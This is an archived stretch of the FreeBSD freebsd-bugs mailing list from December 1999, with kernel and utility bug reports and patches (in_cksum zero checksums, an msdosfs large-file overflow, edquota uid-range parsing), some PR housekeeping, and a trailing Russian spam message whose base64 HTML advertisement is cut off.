freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 11: 0: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D7AEC156AD for ; Thu, 23 Dec 1999 11:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA08161; Thu, 23 Dec 1999 11:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from monster.americantv.com (monster.americantv.com [208.139.222.226]) by hub.freebsd.org (Postfix) with ESMTP id 3C0D914DC6 for ; Thu, 23 Dec 1999 10:59:32 -0800 (PST) (envelope-from jlemon@monster.americantv.com) Received: (from jlemon@localhost) by monster.americantv.com (8.9.3/8.9.2) id MAA66401 for FreeBSD-gnats-submit@freebsd.org; Thu, 23 Dec 1999 12:56:12 -0600 (CST) (envelope-from jlemon) Message-Id: <199912231856.MAA66401@monster.americantv.com> Date: Thu, 23 Dec 1999 12:56:12 -0600 (CST) From: Jonathan Lemon To: FreeBSD-gnats-submit@freebsd.org Subject: kern/15656: in_cksum computes wrong checksum Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15656 >Category: kern >Synopsis: in_cksum computes wrong checksum >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 11:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Jonathan Lemon >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: 4.0-CURRENT, circa Dec 14, 1999 >Description: For some data patterns, in_cksum generates a checksum of 0. The specification says a checksum of 0 should be transmitted as all ones (65535), and a transmitted checksum of 0 indicates that the sender did not compute a checksum. While 0 == 65535 in 1's complement arithmetic, this is still wrong. The error was discovered while doing incremental checksum computations on the TCP stream on an intermediate machine. >How-To-Repeat: tcpdump 'tcp[16:2] == 0', (dump TCP packets with a zero checksum) and transmit various TCP data streams. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 11:41:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from oberon.dnai.com (oberon.dnai.com [207.181.194.97]) by hub.freebsd.org (Postfix) with ESMTP id AE3C815849; Thu, 23 Dec 1999 11:41:08 -0800 (PST) (envelope-from kientzle@acm.org) Received: from acm.org (dnai-216-15-121-225.cust.dnai.com [216.15.121.225]) by oberon.dnai.com (8.9.3/8.9.3) with ESMTP id LAA07539; Thu, 23 Dec 1999 11:41:07 -0800 (PST) Message-ID: <38627AB8.AD0E4D37@acm.org> Date: Thu, 23 Dec 1999 11:40:40 -0800 From: Tim Kientzle Reply-To: kientzle@acm.org X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 3.3-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15639: msdosfs can't read large (3.8gig) files References: <199912230540.VAA80061@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org gnats-admin@FreeBSD.org wrote: > > Thank you very much for your problem report. > It has the internal identification `kern/15639'. > The individual assigned to look at your > report is: freebsd-bugs. > > >Category: kern > >Responsible: freebsd-bugs > >Synopsis: msdosfs can't read large (3.8gig) files > >Arrival-Date: Wed Dec 22 21:40:00 PST 1999 I've since found a fix for this problem. The bug is in 'msdosfs_vnops.c', in the function 'msdosfs_read'. Early in that function, it computes fileSize minus requestedOffset, and stores the difference into a signed int. With very large files, that int can overflow. A better approach is to make 'diff' an unsigned long, use a direct comparison for the initial test, and then be cautious about comparing 'diff' to the signed 'n': if (dep->de_FileSize <= uio->uio_offset) return (0); /* Note: diff can be as large as 4gig! */ diff = dep->de_FileSize - uio->uio_offset; /* Avoid setting n to a negative value */ if ((diff < n) && (diff < LONG_MAX)) n = diff; This change allowed me to successfully copy a 3.8gig file from an MSDOS-formatted hard disk. - Tim Kientzle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 12: 0:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7AF77157BA for ; Thu, 23 Dec 1999 12:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA13903; Thu, 23 Dec 1999 12:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 23 Dec 1999 12:00:02 -0800 (PST) Message-Id: <199912232000.MAA13903@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Steve Price Subject: Re: kern/15639: msdosfs can't read large (3.8gig) files (fwd) Reply-To: Steve Price Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15639; it has been noted by GNATS. From: Steve Price To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: kern/15639: msdosfs can't read large (3.8gig) files (fwd) Date: Thu, 23 Dec 1999 13:50:29 -0600 (CST) ---------- Forwarded message ---------- Date: Thu, 23 Dec 1999 11:40:40 -0800 From: Tim Kientzle To: gnats-admin@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG Subject: Re: kern/15639: msdosfs can't read large (3.8gig) files gnats-admin@FreeBSD.org wrote: > > Thank you very much for your problem report. > It has the internal identification `kern/15639'. > The individual assigned to look at your > report is: freebsd-bugs. > > >Category: kern > >Responsible: freebsd-bugs > >Synopsis: msdosfs can't read large (3.8gig) files > >Arrival-Date: Wed Dec 22 21:40:00 PST 1999 I've since found a fix for this problem. The bug is in 'msdosfs_vnops.c', in the function 'msdosfs_read'. Early in that function, it computes fileSize minus requestedOffset, and stores the difference into a signed int. With very large files, that int can overflow. A better approach is to make 'diff' an unsigned long, use a direct comparison for the initial test, and then be cautious about comparing 'diff' to the signed 'n': if (dep->de_FileSize <= uio->uio_offset) return (0); /* Note: diff can be as large as 4gig! */ diff = dep->de_FileSize - uio->uio_offset; /* Avoid setting n to a negative value */ if ((diff < n) && (diff < LONG_MAX)) n = diff; This change allowed me to successfully copy a 3.8gig file from an MSDOS-formatted hard disk. - Tim Kientzle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 12:20: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 484F814D8B for ; Thu, 23 Dec 1999 12:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA15773; Thu, 23 Dec 1999 12:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 23 Dec 1999 12:20:02 -0800 (PST) Message-Id: <199912232020.MAA15773@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Martin Kammerhofer Subject: Re: conf/9246: allscreens_flags in /etc/rc.conf not working properly Reply-To: Martin Kammerhofer Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR conf/9246; it has been noted by GNATS. From: Martin Kammerhofer To: freebsd-gnats-submit@freebsd.org, dada@sbox.tu-graz.ac.at Cc: Subject: Re: conf/9246: allscreens_flags in /etc/rc.conf not working properly Date: Wed, 22 Dec 1999 19:24:14 +0100 Since the patch I proposed has been commited recently by sheldonh (he was acting on the duplicate PR misc/15066) this PR can be closed now. Martin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 12:45:39 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 2F5131578A for ; Thu, 23 Dec 1999 12:45:33 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.11 #1) id 121F8e-000Fgj-00; Thu, 23 Dec 1999 22:47:08 +0200 From: Sheldon Hearn To: Martin Kammerhofer Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: conf/9246: allscreens_flags in /etc/rc.conf not working properly In-reply-to: Your message of "Thu, 23 Dec 1999 12:20:02 PST." <199912232020.MAA15773@freefall.freebsd.org> Date: Thu, 23 Dec 1999 22:47:08 +0200 Message-ID: <60308.945982028@axl.noc.iafrica.com> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 23 Dec 1999 12:20:02 PST, Martin Kammerhofer wrote: > Since the patch I proposed has been commited recently by sheldonh (he was > acting on the duplicate PR misc/15066) this PR can be closed now. Are you sure? I don't remember merging the change to RELENG_3. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 12:50: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1911D14F0D for ; Thu, 23 Dec 1999 12:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA18140; Thu, 23 Dec 1999 12:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from www.mt.net (mail.mt.net [206.127.64.134]) by hub.freebsd.org (Postfix) with ESMTP id A31D61580C for ; Thu, 23 Dec 1999 12:43:00 -0800 (PST) (envelope-from forrestc@imach.com) Received: (from root@localhost) by www.mt.net (8.9.3/8.9.3) id BAA22027; Thu, 23 Dec 1999 01:25:54 -0700 (MST) (envelope-from forrestc@imach.com) Message-Id: <199912230825.BAA22027@www.mt.net> Date: Thu, 23 Dec 1999 01:25:54 -0700 (MST) From: forrestc@imach.com Reply-To: forrestc@imach.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/15658: Fix to edquota.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15658 >Category: misc >Synopsis: edquota misinterprets usernames as uid ranges >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 12:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Forrest W. Christian >Release: FreeBSD 3.4-STABLE i386 >Organization: iMach, Ltd. >Environment: Apparently all recent versions of FreeBSD. Verified to exist in latest FreeBSD 3.4-STABLE. >Description: The current version of edquota accepts parameters in the form of either a username or a range of userids. In order to determine if a parameter is a range of uid's, it looks to see if the first digit of the parameter is a number, and if the parameter contains a dash. Thus, usernames such as 2-xhibit are treated as a range of uids. The existing code also does no additional error checking and simply performs an atoi on the start of the parameter and on the string starting immediately following the hyphen. >How-To-Repeat: This problem only occurs when using a prototype user. To excersise the chunk of code with the problem, you can run the following command line: edquota -p root 2-xhibit This results in the result: edquota: ending uid (0) must be >= starting uid (2) when using uid ranges >Fix: Apply the following patch to edquota. This performs additional checks on the parameter before determining that it is, in fact, a uid range. ---START OF PATCH---TRIM HERE--- 149,153c149,152 < if (isdigit(*argv[0]) && < (cp = strchr(*argv, '-')) != NULL) { < *cp++ = '\0'; < startuid = atoi(*argv); < enduid = atoi(cp); --- > if ((startuid=(int)(strtol(argv[0],&cp,10))) && > (*(cp++)=='-') && > (enduid=(int)(strtol(cp,&cp,10))) && > (*(cp++)==0) ) { ---END OF PATCH---TRIM HERE--- >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 15:57:32 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D92E414E4B; Thu, 23 Dec 1999 15:57:30 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA32623; Thu, 23 Dec 1999 15:57:30 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 15:57:30 -0800 (PST) From: Message-Id: <199912232357.PAA32623@freefall.freebsd.org> To: steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: pending/15660: tip dumps core when sending file Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: tip dumps core when sending file Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: steve Responsible-Changed-When: Thu Dec 23 15:57:04 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Dec 23 17:32:16 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from thanatos.sovam.com (thanatos.sovam.com [194.67.1.159]) by hub.freebsd.org (Postfix) with ESMTP id C6236150AA for ; Thu, 23 Dec 1999 17:32:07 -0800 (PST) (envelope-from a757@hotmail.com) Received: from ts7-a6.dial.sovam.com ([195.239.0.70]:1427 "HELO obraz" ident: "NO-IDENT-SERVICE[2]" whoson: "strtum@online.ru" smtp-auth: TLS-CIPHER: TLS-CCERT: ) by thanatos.sovam.com with SMTP id ; Fri, 24 Dec 1999 04:31:51 +0300 From: Nick To: bugs@FreeBSD.ORG Subject: úáòáâïôïë ÷ óåôé. Mime-Version: 1.0 Date: Fri, 24 Dec 1999 04:27:37 +0300 Content-Type: multipart/mixed; boundary="= Multipart Boundary 1224990427" Message-Id: <19991224013159Z46268-2489+324@thanatos.sovam.com> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multipart MIME message. --= Multipart Boundary 1224990427 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit Ñìîòðèòå ôàéë Spedia!.html ÂÀØ ÝËÅÊÒÐÎÍÍÛÉ ÀÄÐÅÑ ÁÛË ÂÇßÒ ÈÇ ÎÒÊÐÛÒÎÃÎ ÈÑÒÎ×ÍÈÊÀ. Ïî âñåì âîïðîñàì:aaabbbcccddd@mail.ru ( reply to ëåâûé àäðåññ!) Created with Mail Them 1.41 http://mailthem.hypermart.net --= Multipart Boundary 1224990427 Content-Type: application/octet-stream; name="Spedia!.html" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="Spedia!.html" PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBU cmFuc2l0aW9uYWwvL0VOIj4NCjxIVE1MPg0KPEhFQUQ+DQogICA8TUVUQSBI VFRQLUVRVUlWPSJDb250ZW50LVR5cGUiIENPTlRFTlQ9InRleHQvaHRtbDsg Y2hhcnNldD13aW5kb3dzLTEyNTEiPg0KICAgPE1FVEEgTkFNRT0iR0VORVJB VE9SIiBDT05URU5UPSJNb3ppbGxhLzQuMDYgW2VuXSAoV2luOTg7IEkpIFtO ZXRzY2FwZV0iPg0KICAgPE1FVEEgTkFNRT0iQ09QWVJJR0hUIiBDT05URU5U PSJHZXQgUGFpZC4uLiBNb25leSBmb3IgV2VibWFzdGVycyAmIFN1cmZlcnMi Pg0KICAgPFRJVExFPkdldCBQYWlkLi4uIE1vbmV5IGZvciBXZWJtYXN0ZXJz ICZhbXA7IFN1cmZlcnM8L1RJVExFPg0KPC9IRUFEPg0KPEJPRFkgVEVYVD0i IzgwMDA0MCIgQkdDT0xPUj0iI0RDRkNEQyIgTElOSz0iIzgwODBDMCIgVkxJ Tks9IiNGRjAwRkYiIEFMSU5LPSIjRkYwMEZGIiB0b3BtYXJnaW49IjAiIHRv cG1hcmdpbj0iMCIgYmdwcm9wZXJ0aWVzPSJmaXhlZCI+DQombmJzcDsNCjxD RU5URVI+DQo8UD48Qj48Rk9OVCBGQUNFPSJDb21pYyI+PEZPTlQgQ09MT1I9 IiMzM0NDRkYiPjxGT05UIFNJWkU9KzI+PEEgSFJFRj0iaHR0cDovL3d3dy5z cGVkaWEubmV0L2NnaS1iaW4vZGlyL3R6LmNnaT9ydW49c2hvd19zdmMmZmw9 OCZ2aWQ9MzkxODE0Ij5fX19fX19fX19fX19fX19fX19fX19fX19TcGVkaWFO ZXQNCl9fX19fX19fX19fX19fX19fX19fXzwvQT48L0ZPTlQ+PC9GT05UPjwv Rk9OVD48L0I+PC9DRU5URVI+DQoNCjxCUj4mbmJzcDsNCjxQPjxCUj4NCjxQ PjxCPjxGT05UIEZBQ0U9IkNvbWljIFNhbnMgTVMsVmVyZGFuYSxUYWhvbWEs QXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPs7k7eANCujnIPLl9Swg 7e7i+/Ug7/Du4/Dg7OwsIPP34PHy6OUg4iDq7vLu8O7pIDxVPu3lIO/w5eTz 8ezg8vDo4uDl8jwvVT4g7uH/5+Dy5ev87e7j7g0K8erg9+ji4O3o/yDv8O7j 8ODs7O3u4+4g7uHl8e/l9+Xt6P8uIMfg8OXj6PHy8Ojw7uLg4vjo8fwg4iDv 8O7j8ODs7OUg6uDm5PvpDQrz9+Dx8u3o6iDv7uvz9+Dl8iDi7ufs7ubt7vHy /CDv8/Ll+OXx8uLu4uDy/CDv7iDI7fLl8O3l8vMg4iDx7u/w7uLu5uTl7ejo DQru6u3gLeru7fHu6+gsIOru8u7w7uUg7+7/4uv/5fLx/yDv7vHr5SDt4OHu 8OAg4iDg5PDl8e3u6SDx8vDu6uUg4uD45ePuDQrw7uTt7uPuIOHw7vPn5fDg IPHv5fbo4Ov87e7j7iBVUkwt4OTw5fHgLCDq7vLu8PvpIPHj5e3l8Ojw8+Xy 8f8g5Ov/IOLg8Q0K7+7x6+Ug8OXj6PHy8OD26OguIN3y7iDu6u3uLeru7fHu 6/wg6Ozl5fIg7+7r5SDk6/8g4uLu5OAg4OTw5fHu4iwg7+7r/Ofz//H8DQrq 7vLu8PvsIOL7IO/w6O3u8ejy5SDx5eHlIO/w6OH76/wuIMHg7e3l8O4t7+7q 4Of7IOIg/fLu7CDu6u3lIOLv8P/s8/4g5+Di6PH/8g0K7vIg4uD45ekg4Ory 6OLt7vHy6C4gwuLl5Ljy5SDiIODk8OXx7e7lIO/u6+Ug7urt4C3q7u3x7uvo IDEwMDAg4OTw5fHu4iwNCvPi6OTo8uUgMTAwMCDt7uL79SAo6OvoIPHy4PD7 9Skg4eDt7eXw7uIsIO/u6/P36PLlIDIwIOTu6+vg8O7iLiDN7iDy4Oru6Q0K 7+7k9e7kIOPu5Ojy8f8g8u7r/OruICjv7iDs7uXs8yDj6/Ph7uru7PMg8+Hl 5uTl7ej+KSDk6/8g7+7r/Ofu4uDy5evl6Q0KV2ViLVRWLjwvRk9OVD48L0ZP TlQ+PC9CPg0KPEJSPjxCPjxGT05UIEZBQ0U9IkNvbWljIFNhbnMgTVMsVmVy ZGFuYSxUYWhvbWEsQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPs3u 8Ozg6/zt++UNCu/z8uX45fHy4uXt7ejq6Cwg7vHt4Pm47e375SDh8O7z5+Xw 4OzoIElFNCDoIElFNSDs7uPz8iDk7u/u6+3o8uXr/O3uIPHq4Pfg8vwNCu/w 7uPw4Ozs6vMgKDI4MEtiKSwg8e7i7OXx8ujs8/4g8SDI7fLl8O3l8iDd6vHv 6+7w5fAsIOru8u7w4P8g7+7n4u7r6PINCu/z8uX45fHy4u7i4PL8IO/uIMjt 8uXw7eXy8yDxIPDu5O377CDh8O7z5+Xw7uwuIM/w7uPw4Ozs6uAg8erg9+ji 4OXy8f8NCuIg7O7s5e3yLCDo7fHy4Ovr6PDz5fLx/yDx4OzgLiDN5e7h9e7k 6OzuIPLu6/zq7jo8L0ZPTlQ+PC9GT05UPjwvQj4NCjxCUj48Qj48Rk9OVCBG QUNFPSJDb21pYyBTYW5zIE1TLFZlcmRhbmEsVGFob21hLEFyaWFsLEhlbHZl dGljYSI+PEZPTlQgU0laRT0tMT4xLy0NCu/l8OXn4OPw8+fo8vwg4uD4IElF NCDo6+ggSUU1OzwvRk9OVD48L0ZPTlQ+PC9CPg0KPEJSPjxCPjxGT05UIEZB Q0U9IkNvbWljIFNhbnMgTVMsVmVyZGFuYSxUYWhvbWEsQXJpYWwsSGVsdmV0 aWNhIj48Rk9OVCBTSVpFPS0xPjIvLQ0K7eDm4PL8IO3gIFZpZXcsIOL74fDg 8vwgRXhwbG9yZXIgQmFyLCDt4Obg8vwg7eAgU3BlZGlhIEJhci48L0ZPTlQ+ PC9GT05UPjwvQj4NCjxCUj48Qj48Rk9OVCBGQUNFPSJDb21pYyBTYW5zIE1T LFZlcmRhbmEsVGFob21hLEFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0t MT7C8bgsDQri7ejn8yDi4Pjl4+4g4fDu8+fl8OAg7+7/4ujy8f8g8u7t5e38 6uD/IPDg7O736uAsIOLt8/Lw6CDq7vLu8O7pIOgg4fPk8/INCu/w7ujx9e7k 6PL8IOHg7e3l8O4t7+7q4Of7LiDM7ubt7iDv8O7k7uvm4PL8IO/u6/zn7uLg 8vzx/yD08+3q9uj/7OggRmF2b3JpdGUsDQpIaXN0b3J5LCD5uOvq4PL8IO/u IPHx++vq4OwsIOLxuCDw4OLt7iDh4O3t5fDuLe/u6uDn+yDh8+Tz8iDn4PH3 6PL74uDy/PH/Lg0K0u4t5fHy/Cwg8e718ODt//7y8f8g4vHlIPTz7er26Ogg 4uD45ePuIOHw7vPn5fDgLCDv8O7x8u4g8e7q8OD54OXy8f8g7+vu+eDk/A0K 7/Du8ezu8vDgIPHy8ODt6PYuIM3uIP3y7iDy4Oru5SDs6Ofl8O3u5SDt5fPk 7uHx8uLuLCD38u4g5ePuIO/w4Ory6Pfl8eroDQrt5SDn4Ozl9+Dl+PwuINLg 6ublLCDi+yDs7ubl8uUg8erg9+Dy/CDv8O7j8ODs7OrzLCDx7uLs5fHy6Ozz /iDxIFdpbmRvd3MsDQrluCDs7ubt7iDh8+Tl8iDn4O/z8erg8vwg4eXnIElF LiDd8vMg7/Du4/Dg7Ozq8yDs7ubt7iDo8e/u6/zn7uLg8vwg7/Du8fLuDQrn 4O/z8erg/yDt4CDw4OHu9+XsIPHy7uvlLjwvRk9OVD48L0ZPTlQ+PC9CPg0K PEJSPjxCPjxGT05UIEZBQ0U9IkNvbWljIFNhbnMgTVMsVmVyZGFuYSxUYWhv bWEsQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPtLl7A0K7+7r/Ofu 4uDy5ev/7Cwg6u7y7vD75SDz9+Dx8uLz/vIg4iDt5fHq7uv86uj1IO/w7uPw 4Ozs4PUsIOjt8uXw5fHt7iDh8+Tl8g0K8+ft4PL8LCD38u4g/fLoIO/w7uPw 4Ozs6ugg7O7m7e4g5+Dv8/Hq4PL8IPHu4uzl8fLt7iDxIOTw8+Po7OgsIOru 8u7w++UNCvLg6ublIO/w5eTt4Oft4Pfl7fsg5Ov/IOfg8ODh4PL74uDt6P8g 5OXt5eMuIM3g7/Do7OXwIPEgRGVza3RvcERvbGxhcnMsDQpQYXlCYXIg6CDk 8PPj6OzoLiDH4O/z8erg/yD98ugg7/Du4/Dg7Oz7IO7k7e7i8OXs5e3t7iwg 4vsg7O7m5fLlIO/z8uX45fHy4u7i4PL8DQrv7iDR5fLoLCDv7vHl+eD/IPHg 6fL7LCDw5eru7OXt5O7i4O3t++UsIOTu7/Px8ujsLCDv8O7j8ODs7O7pIEFs bFBhaWRGb3IsDQroIOIg6uDm5O7pIOjnIO/w7uPw4OzsIOLg+OAg8fLg8ujx 8ujq4CDh8+Tl8iDt5fPq6+7t7e4g7/Do8ODx8uDy/C4gwCDn7eD36PIsDQrh 8+Tl8iDv8Ojw4PHy4PL8IOLg+CDl5uXs5fH/9+376SDk7vXu5C48L0ZPTlQ+ PC9GT05UPjwvQj4NCjxCUj48Qj48Rk9OVCBGQUNFPSJDb21pYyBTYW5zIE1T LFZlcmRhbmEsVGFob21hLEFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0t MT7P7uv85+7i4PLl6+gNCuHw7vPn5fDu4iBOZXRzY2FwZSDy4Orm5SDs7uPz 8iDx6uD36OLg8vwg8uDq8/4g7/Du4/Dg7OzzLCDt7iDzIO3o9SDx4u7oDQrn 4Ozu8O736ugsIO4g6u7y7vD79SD/IO/o8eDy/CDt5SDs7uPzLCDv7vHq7uv8 6vMg7+7r/Ofz/vH8IElFNS48L0ZPTlQ+PC9GT05UPjwvQj4NCjxCUj48Qj48 Rk9OVCBGQUNFPSJDb21pYyBTYW5zIE1TLFZlcmRhbmEsVGFob21hLEFyaWFs LEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT48Rk9OVCBDT0xPUj0iIzAwQ0Mw MCI+z+4NCu3u4vvsIO/w4OLo6+DsLCD98uAg7/Du4/Dg7OzgIO3lIOjs5eXy IO7j8ODt6Pfl7ejpIO/uIOLw5ezl7egg7/Du8ezu8vDgITwvRk9OVD4uDQrC +yDs7ubl8uUg7+7r/Ofu4uDy/CBTcGVkaWFCYXIg8fLu6/zq7iDi8OXs5e3o LCDx6u7r/OruIPXu8ujy5S4gz+4g4vvv6+Dy4OwNCufgIPHl7fL/4fD8IOL7 +OvuLCD38u4g7uTo7SD34PEsIOru4+TgIFNwZWRpYUJhciDg6vLo4ujn6PDu 4uDt4Cwg7/Do7e7x6PINCu/u6/zn7uLg8uXr/iA1NCD25e3y4C4gzvfl7fwg 7eXv6+717ukg8/Du4uXt/CDi++/r4PIsIO7x7uHl7e3uLCDl8evoIPP35fHy /CwNCvfy7iDi7iDi8eXs6PDt7iDo5+Ll8fLt7ukg7/Du4/Dg7OzlIEdvVG9X b3JsZCDi++/r4PL7IOfgIPHl7fL/4fD8IOIg8fDl5O3l7A0K8e7x8uDi6Ovo IDE4IPbl7fLu4iDn4CD34PEg8ODh7vL7IPEg6PUg7vfl7fwg7eXz5O7h7fvs ICji7/Du9+XsLCDq7uzzIOrg6ikNCuHw7vPn5fDu7C48L0ZPTlQ+PC9GT05U PjwvQj4NCjxCUj48Qj48Rk9OVCBGQUNFPSJDb21pYyBTYW5zIE1TLFZlcmRh bmEsVGFob21hLEFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT7K8O7s 5Q0K/fLu4+4sIOIg7/Du4/Dg7OzlIO/u/+Lo6+Dx/CDt7uLg/yDs8+v86uA6 IO/w6CDw5ePo8fLw4Pbo6CAo4CDy5Swg6vLuIPPm5Q0K5+Dw5ePo8fLw6PDu 4uDtIOzu4/PyIPHk5evg8vwg/fLuLCDo5+zl7ejiIO/l8PHu7eDr/O3z/iDo 7fTu8Ozg9uj+IO4g8eXh5SkNCu7y7OXy/PLlIPTr4Obq7uwg4uD45SDm5evg 7ejlIO/u6/P34PL8IPDl6uvg7O375SDv6PH87OAg7vIg8OXq6+Ds7uTg8uXr 5ekuDQrH4CDo9SDv7uvz9+Xt6OUg4uDsIPLg6ublIOHz5PPyIO/r4PLo8vwu IM7yIO//8ugg5O4g5OXx//LoIO736u7iLCDq4Oog5+ANCurg5uT76SDv7urg 5y4g0eDs6CDx7vfy6PLlLCDs7e7j7iD98u4g6OvoIOzg6+4uIMIg6u7t9uUg 6u7t9u7iIOLx5ePk4CDs7ubt7g0K7vLq4Ofg8vzx/yDu8iDw4PHx++vq6CDv 6PHl7C4gyCDq4Oog7vDj4O3o5+Dy7vD7IOfg/+Lr//7yIOIg8u7pLeblIPTu 8OzlLA0K4uD44CD34PHy7eD/IO/l8OXv6PHq4CDh8+Tl8iDn4Pno+eXt4C4g 0u4t5fHy/Cwg7O7m5fLlIOH78vwg8+Ll8OXt+ywg9/LuDQrv7vHr5SDu8urg 5+Ag7vIg8ODx8fvr6ugg4uDsIPDl6uvg7O379SDv6PHl7Cwg4iDi4Pgg//no 6iDt5SDv7u/g5LjyIOHu6+XlDQrt6CDu5O3uLiDP7urgIOX5uCD98uAg8fLu 8O7t4CDv8O7j8ODs7PsgU3BlZGlhIO3lIPDg4e7y4OXyLCDv7v3y7uzzIOru 7erw5fLt7g0K7iDy7uwsIOrg6iDw5eDj6PDu4uDy/CDt4CD98ugg7+jx/Ozg LCD/IPDg8fHq4ObzIO3gIP3y7ukt5uUg8fLw4O3o9uUsIOrg6g0K8u7r/Oru IO7t6CDt4Pft8/Ig8ODx8fvr6vMuPC9GT05UPjwvRk9OVD48L0I+DQo8QlI+ PEI+PEZPTlQgRkFDRT0iQ29taWMgU2FucyBNUyxWZXJkYW5hLFRhaG9tYSxB cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+wvsNCuzu5uXy5SDv8Ojj 